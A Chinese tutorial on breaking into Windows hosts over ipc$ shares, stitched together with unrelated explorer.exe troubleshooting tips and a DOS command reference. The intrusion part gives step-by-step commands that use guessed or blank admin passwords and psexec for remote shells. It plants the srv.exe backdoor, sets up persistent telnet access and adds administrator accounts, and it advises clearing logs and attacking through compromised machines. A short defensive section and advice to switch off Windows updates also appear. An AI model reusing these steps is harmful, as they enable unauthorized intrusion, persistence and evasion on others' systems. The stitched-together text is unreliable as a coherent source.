呵呵，大家也知道，ipc$连接在实际#作过程中会出现各种各样的问题，上面我所总结的只是一些常见错误，没说到的，大家可以给我提个醒儿。

九 关于at命令和xp对ipc$的限制
本来还想说一下用at远程运行程序失败的原因，但考虑到at的成功率不是很高，问题也很多，在这里就不提它了（提的越多，用的人就越多），而是推荐大家用p***ec.exe远程运行程序，假设想要远程机器执行本地c:\xinxin.exe文件，且管理 员为administrator，密码为1234，那么输入下面的命令：
p***ec \\ip -u administrator -p 1234 -c c:\xinxin.exe
如果已经建立ipc连接，则-u -p这两个参数不需要，p***ec.exe将自动拷贝文件到远程机器并运行。

本来xp中的ipc$也不想在这里讨论，想单独拿出来讨论，但看到越来越多的朋友很急切的提问为什么遇到xp的时候，大部分#作都很难成功。我在这里就简单提一下吧，在xp的默认安全选项中，任何远程访问仅被赋予来宾权限，也就是说即使你是用管理员帐户和 密码，你所得到的权限也只是Guest，因此大部分#作都会因为权限不够而失败，而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了xp的管理员密码，我建议你尽量避开ipc管道。

十 如何打开目标的IPC$共享以及其他共享
目标的ipc$不是轻易就能打开的，否则就要天下打乱了。你需要一个admin权限的shell，比如telnet，木马，cmd重定向等，然后在shell下执行：
net share ipc$
开放目标的ipc$共享；
net share ipc$ /del
关闭目标的ipc$共享；如果你要给它开共享文件夹，你可以用：
net share xinxin=c:\
这样就把它的c盘开为共享名为xinxin共享文件夹了。（可是我发现很多人错误的认为开共享文件夹的命令是net share c$，还大模大样的给菜鸟指指点点，真是误人子弟了）。再次声明，这些#作都是在shell下才能实现的。

十一 一些需要shell才能完成的命令
看到很多教程这方面写的十分不准确，一些需要shell才能完成命令就简简单单的在ipc$连接下执行了，起了误导作用。那么下面我总结一下需要在shell才能完成的命令：

1 向远程主机建立用户，激活用户，修改用户密码，加入管理组的#作需要在shell下完成；

2 打开远程主机的ipc$共享，默认共享，普通共享的#作需要在shell下完成；

3 运行/关闭远程主机的服务，需要在shell下完成；

4 启动/杀掉远程主机的进程，也需要在shell下完成（用软件的情况下除外，如pskill）。

十二 入侵中可能会用到的命令
为了这份教程的完整性，我列出了ipc$入侵中的一些常用命令，如果你已经掌握了这些命令，你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程，如果只适用于本地，你只能在获得远程主机的shell（如cmd，telnet等）后，才能 向远程主机执行。

1 建立/删除ipc$连接的命令

1）建立空连接:
net use \\127.0.0.1\ipc$ "" /user:""

2）建立非空连接:
net use \\127.0.0.1\ipc$ "密码" /user:"用户名"

3）删除连接:
net use \\127.0.0.1\ipc$ /del

2 在ipc$连接中对远程主机的#作命令

1） 查看远程主机的共享资源（看不到默认共享）:
net view \\127.0.0.1

2） 查看远程主机的当前时间:
net time \\127.0.0.1

3） 得到远程主机的netbios用户名列表:
nbtstat -A 127.0.0.1

4）映射/删除远程共享:
net use z: \\127.0.0.1\c
此命令将共享名为c的共享资源映射为本地z盘

net use z: /del
删除映射的z盘，其他盘类推

5）向远程主机复制文件:
copy 路径\文件名 \\IP\共享目录名，如：
copy c:\xinxin.exe \\127.0.0.1\c$ 即将c盘下的xinxin.exe复制到对方c盘内
当然，你也可以把远程主机上的文件复制到自己的机器里：
copy \\127.0.0.1\c$\xinxin.exe c:\

6）远程添加计划任务:
at \\IP 时间 程序名 如：
at \\127.0.0.0 11:00 xinxin.exe
注意：时间尽量使用24小时制；如果你打算运行的程序在系统默认搜索路径（比如system32/）下则不用加路径，否则必须加全路径

3 本地命令

1）查看本地主机的共享资源（可以看到本地的默认共享）
net share

2）得到本地主机的用户列表
net user

3）显示本地某用户的帐户信息
net user 帐户名

4）显示本地主机当前启动的服务
net start

5）启动/关闭本地服务
net start 服务名
net stop 服务名

6）在本地添加帐户
net user 帐户名 密码 /add

7）激活禁用的用户
net uesr 帐户名 /active:yes

8）加入管理员组
net localgroup administrators 帐户名 /add

很显然的是，虽然这些都是本地命令，但如果你在远程主机的shell中输入，比如你telnet成功后输入上面这些命令，那么这些本地输入将作用在远程主机上。

4 其他一些命令
1）telnet
telnet IP 端口
telnet 127.0.0.0 23

2）用opentelnet.exe开启远程主机的telnet
OpenTelnet.exe \\ip 管理员帐号 密码 NTLM的认证方式 port
OpenTelnet.exe \\127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求：
1）目标开启了ipc$共享
2）你要拥有管理员密码和帐号
3）目标开启RemoteRegistry服务，用户就可以更改ntlm认证
4）对仅WIN2K/XP有效

3）用p***ec.exe一步获得shell，需要ipc管道支持
p***ec.exe \\IP -u 管理员帐号 -p 密码 cmd
p***ec.exe \\127.0.0.1 -u administrator -p "" cmd

十三 对比过去和现今的ipc$入侵
既然是对比，那么我就先把过去的ipc$入侵步骤写给大家，都是蛮经典的步骤：

[1]
C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators
\\用扫到的空口令建立连接　　

[2]
c:\>net view \\127.0.0.1
\\查看远程的共享资源

[3]
C:\>copy srv.exe \\127.0.0.1\admin$\system32
\\将一次性后门srv.exe复制到对方的系统文件夹下，前提是admin$开启　　

[4]
C:\>net time \\127.0.0.1
\\查看远程主机的当前时间

[5]
C:\>at \\127.0.0.1 时间 srv.exe
\\用at命令远程运行srv.exe，需要对方开启了''Task Scheduler''服务　　

[6]
C:\>net time \\127.0.0.1
\\再次查看当前时间来估算srv.exe是否已经运行，此步可以省略

[7]　　　　
C:\>telnet 127.0.0.1 99
\\开一个新窗口，用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么意思？那你就把它想象成远程机器的控制权就好了，#作像DOS)，99端口是srv.exe开的一次性后门的端口　　

[8]
C:\WINNT\system32>net start telnet
\\我们在刚刚登陆上的shell中启动远程机器的telnet服务，毕竟srv.exe是一次性的后门，我们需要一个长久的后门便于以后访问，如果对方的telnet已经启动，此步可省略

[9]
C:\>copy ntlm.exe \\127.0.0.1\admin$\system32
\\在原来那个窗口中将ntlm.exe传过去，ntlm.exe是用来更改telnet身份验证的　　

[10]
C:\WINNT\system32>ntlm.exe
\\在shell窗口中运行ntlm.exe，以后你就可以畅通无阻的telnet这台主机了
　　
[11]
C:\>telnet 127.0.0.1 23
\\在新窗口中telnet到127.0.0.1，端口23可省略，这样我们又获得一个长期的后门

[12]
C:\WINNT\system32>net user 帐户名 密码 /add
C:\WINNT\system32>net uesr guest /active:yes
C:\WINNT\system32>net localgroup administrators 帐户名 /add
\\telnet上以后，你可以建立新帐户，激活guest，把任何帐户加入管理员组等

好了，写到这里我似乎回到了2，3年前，那时的ipc$大家都是这么用的，不过随着新工具的出现，上面提到的一些工具和命令现在已经不常用到了，那就让我们看看现在的高效而简单的ipc$入侵吧。

[1]
p***ec.exe \\IP -u 管理员帐号 -p 密码 cmd
\\用这个工具我们可以一步到位的获得shell

OpenTelnet.exe \\server 管理员帐号 密码 NTLM的认证方式 port
\\用它可以方便的更改telnet的验证方式和端口，方便我们登陆

[2]
已经没有第二步了，用一步获得shell之后，你做什么都可以了，安后门可以用winshell，克隆就用ca吧，开终端用3389.vbe，记录密码用win2kpass，总之好的工具不少，随你选了，我就不多说了。

十四 如何防范ipc$入侵察看本地共享资源
运行-cmd-输入net share
删除共享(每次输入一个）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）

1 禁止空连接进行枚举(此#作并不能阻止空连接的建立)

运行regedit，找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：1
如果设置为"1"，一个匿名用户仍然可以连接到IPC$共享，但无法通过这种连接得到列举SAM帐号和共享信息的权限；在Windows 2000 中增加了"2"，未取得匿名权的用户将不能进行ipc$空连接。建议设置为1。如果上面所说的主键不存在，就新建一个再改键值。如果你觉得改注册表麻烦，可以在本地安全设置中设置此项： 在本地安全设置－本地策略－安全选项－''对匿名连接的额外限制''

2 禁止默认共享

1）察看本地共享资源
运行-cmd-输入net share

2）删除共享（重起后默认共享仍然存在）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）

3）停止server服务
net stop server /y （重新启动后server服务会重新开启）

4）禁止自动打开默认共享（此#作并不能关闭ipc$共享）
运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。
这两个键值在默认情况下在主机上是不存在的，需要自己手动添加，修改后重起机器使设置生效。

3 关闭ipc$和默认共享依赖的服务:server服务
如果你真的想关闭ipc$共享，那就禁止server服务吧：
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-选已禁用，这时可能会有提示说：XXX服务也会关闭是否继续，因为还有些次要的服务要依赖于server服务，不要管它。

4 屏蔽139，445端口
由于没有以上两个端口的支持，是无法建立ipc$的，因此屏蔽139，445端口同样可以阻止ipc$入侵。

1）139端口可以通过禁止NBT来屏蔽
本地连接－TCP/IT属性－高级－WINS－选‘禁用TCP/IT上的NETBIOS’一项

2）445端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
value: 0
修改完后重启机器
注意：如果屏蔽掉了以上两个端口，你将无法用ipc$入侵别人。

3）安装防火墙进行端口过滤

6 设置复杂密码，防止通过ipc$穷举出密码，我觉得这才是最好的办法，增强安全意识，比不停的打补丁要安全的多。

十五 ipc$入侵问答精选
1.进行ipc$入侵的时候，会在服务器中留下记录，有什么办法可以不让服务器发现吗？

答：留下记录是一定的，你走后用清除日志程序删除就可以了，或者用肉鸡入侵。

2.你看下面的情况是为什么，可以连接但不能复制
net use \\***.***.***.***\ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe \\***.***.***.***\admin$
找不到网络路径
命令不成功

答：像“找不到网络路径”“找不到网络名”之类的问题，大多是因为你想要复制到的共享文件夹没有开启，所以在复制的时候会出现错误，你可以试着找找其他的共享文件夹。

3.如果对方开了IPC$，且能建立空联接，但打开C、D盘时，都要求密码，我知道是空连接没有太多的权限，但没别的办法了吗？

答：建议先用流光或者别的什么扫描软件试着猜解一下密码，如果猜不出来，只能放弃，毕竟空连接的能力有限。

4.我已经猜解到了管理员的密码，且已经ipc$连接成功了，但net view \\ip发现它没开默认共享，我该怎么办？

答：首先纠正你的一个错误，用net view \\ip是无法看到默认共享的，你可以试着将文件复制到c$，d$看看，如果都不行，说明他关闭了默认共享，那你就用opentelnet.exe或p***ec.exe吧，用法上面有。

5.ipc$连接成功后，我用下面的命令建立了一个帐户，却发现这个帐户在我自己的机器上，这是怎么回事？
net uset ccbirds /add

答：ipc$建立成功只能说明你与远程主机建立了通信隧道，并不意味你取得了一个shell，只有在获得一个shell（比如telnet）之后，你才能在远程机器建立一个帐户，否则你的#作只是在本地进行。

6.我已进入了一台肉机，用的管理员帐号，可以看他的系统时间，但是复制程序到他的机子上却不行，每次都提示“拒绝访问，已复制0个文件”，是不是对方有什么服务没开，我该怎么办？

答：一般来说“拒绝访问”都是权限不够的结果，可能是你用的帐户有问题，还有一种可能，如果你想向普通共享文件夹复制文件却返回这个错误，说明这个文件夹设置的允许访问用户中不包括你（哪怕你是管理员），这一点我在上一期文章中分析了。

7.我用Win98能与对方建立ipc$连接吗？

答：理论上不可以，要进行ipc$的#作，建议用win2000，用其他#作系统会带来许多不必要的麻烦。

8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话，但用nbtstat -A IP 却无法导出用户列表，这是为什么？

答：空会话在默认的情况下是可以导出用户列表的，但如果管理员通过修改注册表来禁止导出列表，就会出现你所说的情况；还有可能是你自己的NBT没有打开，netstat命令是建立在NBT之上的。　　

9.我建立ipc$连接的时候返回如下信息：‘提供的凭据与已存在的凭据集冲突’，怎么回事？

答：呵呵，这说明你已经与目标主机建立了ipc$连接，两个主机间同时建立两个ipc$连接是不允许的。

10.我在映射的时候出现：
F:\>net use h: \\211.161.134.*\e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事？

答：你也太粗心了吧，这说明你有一个h盘了，映射到没有的盘符吧！

11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" 成功了，但当我映射时出现了错误，向我要密码，怎么回事？
F:\>net use h: \\*.*.*.*\c$
密码在 \\*.*.*.*\c$ 无效。
请键入 \\*.*.*.*\c$ 的密码:
系统发生 5 错误。
拒绝访问。

答：呵呵，向你要密码说明你当前使用的用户权限不够，不能映射C$这个默认共享，想办法提升权限或者找管理员的弱口令吧！默认共享一般是需要管理员权限的。

12.我用superscan扫到了一个开了139端口的主机，但为什么不能空连接呢？

答：你混淆了ipc$与139的关系，能进行ipc$连接的主机一定开了139或445端口，但开这两个端口的主机可不一定能空连接，因为对方可以关闭ipc$共享.

13.我门局域网里的机器大多都是xp，我用流光扫描到几个administrator帐号口令是空，而且可以连接，但不能复制东西，说错误5。请问为什么？

答：xp的安全性要高一些，在安全策略的默认设置中，对本地帐户的网络登录进行身份验证的时候，默认为来宾权限，即使你用管理员远程登录，也只具有来宾权限，因此你复制文件，当然是错误5：权限不够。

14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功，可是 net use i: \\192.168.0.2\c
出现请键入 \\192.168.0.2 的密码，怎么回事情呢？我用的可是管理员呀？应该什么都可以访问呀？

答：虽然你具有管理员权限，但管理员在设置c盘共享权限时（注意：普通共享可以设置访问权限，而默认共享则不能）可能并未设置允许administrator访问，所以会出现上述问题。

15.如果自己的机器禁止了ipc$, 是不是还可以用ipc$连接别的机器？如果禁止server服务呢？

答：禁止以上两项仍可以发起ipc$连接，不过这种问题自己动手试验会更好。

16.能告诉我下面的两个错误产生的原因吗？
c:\>net time \\61.225.*.*
系统发生 5 错误。
拒绝访问。

c:\>net view \\61.225.*.*
系统发生 5 错误。
拒绝访问。

答：起初遇到这个问题的时候我也很纳闷，错误5表示权限不够，可是连空会话的权限都可以完成上面的两个命令，他为什么不行呢？难道是他没建立连接？后来那个粗心的同志告诉我的确是这样，他忘记了自己已经删了ipc$连接，之后他又输入了上面那两个命令，随 之发生了错误5。

17.您看看这是怎么回事？
F:\>net time
找不到时间服务器。
请键入 NET HELPMSG 3912 以获得更多的帮助。

答：答案很简单，你的命令错了，应该是net time \\ip
没输入ip地址，当然找不到服务器。view的命令也应该有ip地址，即：net view \\ip

问：

磁盘有FAT32和NTFS两种格式
那个好一点！
怎么互相转化啊？

答：

FAT32 ：DOS兼容性不错，如果经常进行GHOST和各种DOS操作，建议使用FAT32。

实际测试后，发现分区容量在8G以下，FAT32比NTFS高效率。

NTFS：高安全性，产生文件碎片的几率小……。

18G以上的分区，使用NTFS则效率较高。

怎么互相转化：使用光盘中的PQ8.02，转换过程不损坏文件。

使用这张光盘安装完系统，第一次进系统会询问要不要转换成NTFS。

建议：C盘分为8G，使用FAT32，方便GHOST和DOS操作。其它分区为NTFS。

最后一个分区建议为FAT32，5G以上，存放备份后的GHO文件。

PS：FAT32和NTFS实际上不是一种磁盘格式，而是文件管理系统。

1. 软件问题（特别是右键第三方加载项）
安装清华紫光输入法3.0版本有的时候会出现explorer.exe出错，取消清华紫光输入法，用其他输入法输法如果没有问题，可以判断为输入法问题。卸载清华紫光输入法，即可解决。
清华紫光输入法4.0版本未发现类似问题。
苹果美化版的rar惹的祸，把它卸载了暂时就没有这个错误了，你也可以看是不是安装了苹果美化版的rar，有的话，也可以卸载了来看一下,装了酒精120%或者酒精52%虚拟光驱，在的系统中很容易出现explorer.exe错误。卸载有时候会解决问题

2. explorer.exe程序本身的原因
检查explorer.exe的文件大小，正常情况下应该显示为237k或者238k，如果大小不一致，可以从别的机器上拷贝一个explorer.exe文件到本机，调用任务管理器，接入explorer.exe进程，然后新建任务拷贝新的文件到系统盘\WINNT目录下。

3. 可能为病毒原因（wc98pp.dll）
（我的就是中了木马捆绑病毒，它捆绑explorer.exe运行，所以当登陆的时候就没响应，用流行病毒专杀工具Spant.EXE可以杀掉，或装诺顿也可以杀。）
网络协议处理器 - 电子书编译工具Web Compiler相关。
wc98pp.dll文件本身并没有影响，很多计算机上都有此文件，但是当explorer.exe出错的时候，删除此文件可以解决问题，然后从注册表中搜索相关键值删除。
usign.dll，有人提到这个文件与wc98pp.dll两个文件类似，删除这两个文件可以清除IE中不断跳出小广告。在公司的计算机中未发现此文件。

4. 其他原因
计算机运行某个程序等待时间过长，比如读取数据，尤其是光盘或者外界设备的数据的时候，也会出现explorer.exe出错，提示与上面的情况相同。

5. 系统内核错误
此类情况我暂时无法解决，重新安装系统。

6.内存问题
有人通过更换内存,解决了这个问题,所以这应该是个原因,不过如果这个出问题就比较麻烦了,所以先考虑前面几个原因

7.windows升级造成的
大家都知道我们用的是盗版xp,既然是盗版的,肯定会出现各种各样的错误.微软也不是sb,肯定会搞一些问题来惩罚我们,所以建议大家不要上网自动更新,并且把自动更新关掉(实际上这个更新没p用)

下面是从网上搜索到的一些关于此烦人错误的资料及解决方法

1.第三方加载项的问题
我以一般的途径从遇到explorer错误的人们得到信息。通常他们都这么叙述:" 当我在资源管理器中右键点击一个文件时系统提示explorer遇到错误需要关闭"或"当我尝试浏览文件夹的时候,我收到系统提示 xplorer遇到错误需要关闭" 。 通常，这些错误是由于第三方加载项没有正常工作所引起的 这些加载项负责创建一些选项当你在资源管理器右键点击一个文件时。一些第三方程序会添加他们自己的选项到这些菜单，而这有些时候会出现问题 如果你仔细看下面的图片，你会发现几个非常规的选项在这个右键菜单上： "Send to Fax Recipient"，"Scan with Norton Antivirus", "TextPad" 和 "Winzip"。
如果想尝试寻找引起explorer错误的第三方加载项，你需要下载这个工具：ShellExView，它会允许你查
看和禁用加载项 解决办法：当你下载并运行它以后，ShellExView会显示出所有的安装在你的电脑上的加载项。你可以分类排序使所有第三方加载项示在一起。然后，选择所有第三方加载项并禁用它们，并试着执行以前导致错误的操作（比如右键点击一个文件或浏览一个文件夹等等）如果没有错误提示，就说明你所禁用的一个加
载项造成了explorer错误。接下来，通过每一次启用一个加载项并尝试之前引起错误的操作就可以找出引起错误的第三方扩展了ShellExView会显示出加载项的所有的额外信息, 比如版本号、公司名称。如果你希望继续使用致使
explorer出错的加载项，请检查他的更新版本或联系他的客户支持
explorer出错的另一个原因是因为机器里内含病毒、木马或间谍广告程序。想检测电脑里存在的病毒请使
用专业的程序，比如江民、瑞星等杀毒软件；检测电脑里存在的间谍软件，我推荐下列程序：Microsoft

Windows AntiSpyware (Beta)、Lavasoft's Ad-Aware、Rose City Software's Spyware Medic或者Spybot's Search & Distroy。
ShellExView这个软件在附件里面有提供.

2.一些关于此问题的中文知识库文章
在“地址”框或“打开”框中键入地址时出现错误消息 桌面是白色的并且错误信息报告 Browseui.dll 中有“Windows 资源管理器”错误
错误信息：Explorer Caused an Invalid Page Fault in Module Browseui.dll（资源管理器导致模块

Browseui.dll 中出现无效页面错误）

错误信息：Error Loading Explorer.exe You Must Reinstall Windows（加载 Explorer.exe 时出现错误，必须重新安装 Windows)

查看“我的电脑”中的内容时 Windows 资源管理器退出

在试图映射网络驱动器时 Windows 资源管理器退出并生成错误信息

尝试安装 Windows 2000 Service Pack 3 时出现错误信息“Explorer.exe Has Generated Errors and

Will Be Closed By Windows”（Explorer.exe 发生错误，将被 Windows 关闭）

在关闭某个文件夹时，Explorer.exe 可能会生成一个应用程序错误

尝试打开“网上邻居”时收到“Windows Explorer Has Encountered a Problem and Needs to Close”
（Explorer.exe 发生错误，将被 Windows 关闭）错误消息

右键单击文件时出现错误信息，或是当在 Autodesk 或 Discreet 产品中打开某些文件时发生问题

在 Windows XP 中试图打开“网上邻居”或“共享文档”时，“我的电脑”和 Windows 资源管理器意外退出

Explorer.exe 在 Windows XP 中反复意外退出

3.怎样避免

使用Windows XP时间比较长后，有时运行会很不流畅，甚至会不响应鼠标键盘对操作。很多时候是系统的假死。和真正的死机不同，假死完全可以被“救活”。假死的根源在于explorer.exe(整个图形界面的驱动)。既然会假死，那就一定有解决方法，下面就为朋友们介绍一些拯救系统假死的方法。
第一招:当使用资源管理器打开新文件夹或用浏览器打开新页面不响应时，用“Win+D”或单击快速启动栏的显示桌面按钮，再在桌面上按F5或右键刷新即可。一般刷新3-5次后再把资源管理器或浏览器窗口还原就会恢复正常了。
第二招:这一招很灵，能对付大多数假死的情况。当任务管理器都打不开时，先把光驱弹出之后再弹入(千万不要在光驱里放光盘)，鼠标指针旁会出现一个小光盘标志，这时就会唤起系统的知觉，这招可是屡试不爽!
第三招:最后的杀手锏，用组合键“Ctrl+Alt+Del”启动任务管理器，然后在“进程”选项卡中结束explorer.exe，整个桌面只剩一张壁纸，桌面图标和任务栏都没影了，然后在任务管理器的“文件→新建

任务”中输入explorer.exe，即可恢复正常。这一招还可释放内存资源，一举两得。
照下面的方法可以明显减少假死可能性:
能不用右键菜单的时候就尽量不用，尽量使用热键如用F2重命名、用F5刷新等。Windows Media

Player最好不用可视化效果，用了往往会卡机。真想用的话，微粒是最不容易卡机的，建议用“微粒”可视化效果。不要轻易使用内存整理软件，往往会越整理系统速度越慢。如果真想释放系统资源，注销当前

用户再重新登录是最好的方式。说了这么多，大家也不妨试试这些方法。

4.有人提出的一个方法
关于EXPLORER.EXE出错解决方法，大家试试
把如下内容做成批处理文件，执行一下。explorer的问题基本上可以解决。

常用的外部命令详解
1．DELTREE——删除整个目录命令
ü 功能：将整个目录及其下属子目录和文件删除。
类型：外部命令ü
格式：DELTREE[盘符：]〈路径名〉ü
FOR 1：
C:\>deltree yyy
Delete directory "yyy" and all its subdirectories? [yn]

2． FORMAT——磁盘格式化命令
ü 功能：对磁盘进行格式化，划分磁道和扇区；同时检查出整个磁盘上有无带缺陷的磁道，对坏道加注标记；建立目录区和文件分配表，使磁盘作好接收DOS的准备。
ü 类型：外部命令
格式：FORMAT〈盘符：〉[/Q][/S][/AUTOTEST]ü
FOR 2.：
C:\>format d:/q/s/autotes
Checking existing disk fo

3． DISKCOPY——整盘复制命令
ü 功能：复制格式和内容完全相同的软盘。
类型：外部命令ü
格式：DISKCOPY[盘符1：][盘符2：]ü
FOR 3：
C:\>diskcopy a: b: /*---这里的源盘是A盘，目标盘为B盘---*/

4． LABEL——建立磁盘卷标命令
功能：建立、更改、删除磁盘卷标。ü
类型：外部命令ü
ü 格式：LABEL[盘符：][卷标名]
FOR 4：
C:\>label c: yyy /*---将C盘的卷标更改为YYY---*/

5．VOL——显示磁盘卷标命令
功能：查看磁盘卷标号。ü
类型：内部命令ü
ü 格式：VOL[盘符：]
FOR 5：
C:\>vol c:
Volume in drive C is YYY
Volume Serial Number is C406-9364

6．SYS——系统复制命令
ü 功能：将当前驱动器上的DOS系统文件IO.SYS,MSDOS.SYS和COMMAND.COM 传送到指定的驱动器上。
类型：外部命令ü
ü 格式：SYS[盘符：]
*说明：如果磁盘剩余空间不足以存放系统文件，则提示：No roomfor on destination disk.
FOR 6：
C:\>sys d:
System transferred /*---系统文件已经转移到D盘---*/
7．XCOPY——目录复制命令
ü 功能：复制指定的目录和目录下的所有文件连同目录结构。
类型：外部命令ü
格式：XCOPYü [源盘：]〈源路径名〉[目标盘符：][目标路径名][/S][/V][/E]
说明：XCOPY是COPY的扩展，可以把指定的目录连文件和目录结构一并拷贝，但不能拷贝隐藏文件和系统文件；选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数，否则/S不会拷贝空目录，若不指定/S参数，则XCOPY只拷贝源目录本身的文件，而不涉及其下的子目录；选用/V参数时，对的拷贝的扇区都进行较验，但速度会降低。
FOR 7：
C:\>xcopy yyy d:
yyy.txt
1 File(s) copied

8．FC——文件比较命令
功能：比较文件的异同，并列出差异处。ü
类型：外部命令ü
ü 格式：FC[盘符：][路径名]〈文件名〉[盘符：][路径名][文件名][/A][/b][/C][/N]
说明：选用/A参数，为ASCII码比较模式；选用/B参数，为二进制比较模式；选用/C参数，将大小写字符看成是相同的字符；选用/N参数，在ASCII码比较方式下，显示相异处的行号。
FOR 8：
C:\>fc yyy.txt cly.txt
Comparing files yyy.txt and cly.txt
****** yyy.txt
oeekjeheqwkf
****** cly.txt
1111
******

9．ATTRIB——修改文件属性命令
功能：修改指定文件的属性。ü
ü 类型：外部命令。
ü 格式：ATTRIB[文件名][R][—R][A][—A][H][—H][S][—S][/S]
说明：选用R参数，将指定文件设为只读属性，使得该文件只能读取而无法写入数据或删除，选用——R参数，去除只读属性；A参数为档案属性；H参数为隐含属性；S参数为系统属性。
FOR 9：
C:\>attrib yyy.txt +h +r /*---将记事本文件设置为隐藏、只读属性---*/
C:\>attrib yyy.txt -h –r /*---将记事本文件去掉隐藏、只读属性---*/

10．MEM——查看当前内存状况命令
ü 功能：显示当前内存使用的情况
类型：外部命令ü
ü 格式：MEM[/C][/F][/M][/P]
说明：选用/C参数列出装入常规内存和CMB的各文件的长度，同时也显示内存空间的使用状况和最大的可用空间；选用/F参数分别列出当前常规内存剩余的字节大小和UMB可用的区域及大小；选用/M参数显示该模块使用内存地地址、大小及模块性质；选用/P参数指定当输出超过一屏时，暂停供用户查看。
FOR 10：
C:\>mem

11．TREE——显示磁盘的目录结构
功能：显示指定磁盘或路径的目录结构。ü
ü 类型：外部命令。
格式ü [盘符][路径]TREE[盘符][路径][/F]
说明：命令格式中的前一个盘符与路径是用来说明tree.com文件所在的盘与目录；第二个盘符与路径是用来说明需要显示目录结构的磁盘与目录；参数/F除显示目录结构外，还显示各级目录中的所有文件。若省略此参数，仅仅显示目录结构；当目录结构较长且一屏显示不下时，可用命令TREE|MORE分屏显示。
FOR 11：
C:\>tree /*---因为是tree是外部命令，所有tree.com文件是一定要存在的，否则无法正常使用---*/
操作实例：
①在C盘下新建两个目录X和Y，②进入X目录下新建一个x..bat文件,③再在Y目录下新建y.txt文件，④将x..bat和y.txt文件合并一个新文件xy.bat并保存在D盘，⑤将xy.bat重命名为xy.txt,并查看文件里面的具体内容，⑥在文件里面加入自己的x+y=z并保存，⑦将xy.txt文件属性设置为只读和隐藏。
操作过程：
C:\>md x
C:\>md y
C:\>cd x
C:\x>edit
C:\x>cdC:\>cd y
C:\y>edit
C:\>copy c:\x\x.bat+c:\y\y.txt d:\xy.bat
c:\x\x.bat
c:\y\y.txt
1 file(s) copied

C:\>ren d:\xy.bat xy.txt
C:\>type d:\xy.txt
C:\>edit d:\xy.txt
C:\>attrib +r +h d:\xy.txt

常用网络DOS命令，入侵初学的朋友看好了hoho~！

fport 查看系统端口和端口上运行的程序

netstat -an 查看所有连接本机IP

ipconfig /all 查看所有连接本机IP

telnet IP 端口 连接对方机器某个端口

net user 查看本机用户
net user 用户名 密码 /add 建立一个用户
net user 用户名 /del 删除一个用户

net localgroup administrators 用户名 /add 把用户添加到管理员
net localgroup administrators 用户名 /del 把用户从管理员组删除

啊，好累啊，好像就这么多啦。。。。
哦，对了，好像还没交怎样在对方机器DOS窗口下建立批处理文件

copy con 文件名.bat

………………

………………

（省略号代表命令）

CTRL+Z 存盘退出

这样一个bat文件也就做好了。

对了，还有个是mint教的echo命令，这个命令不仅能建bat，还可以建txt

命令如下

echo dir c:\ >2.bat
echo dir d:\ >>2.bat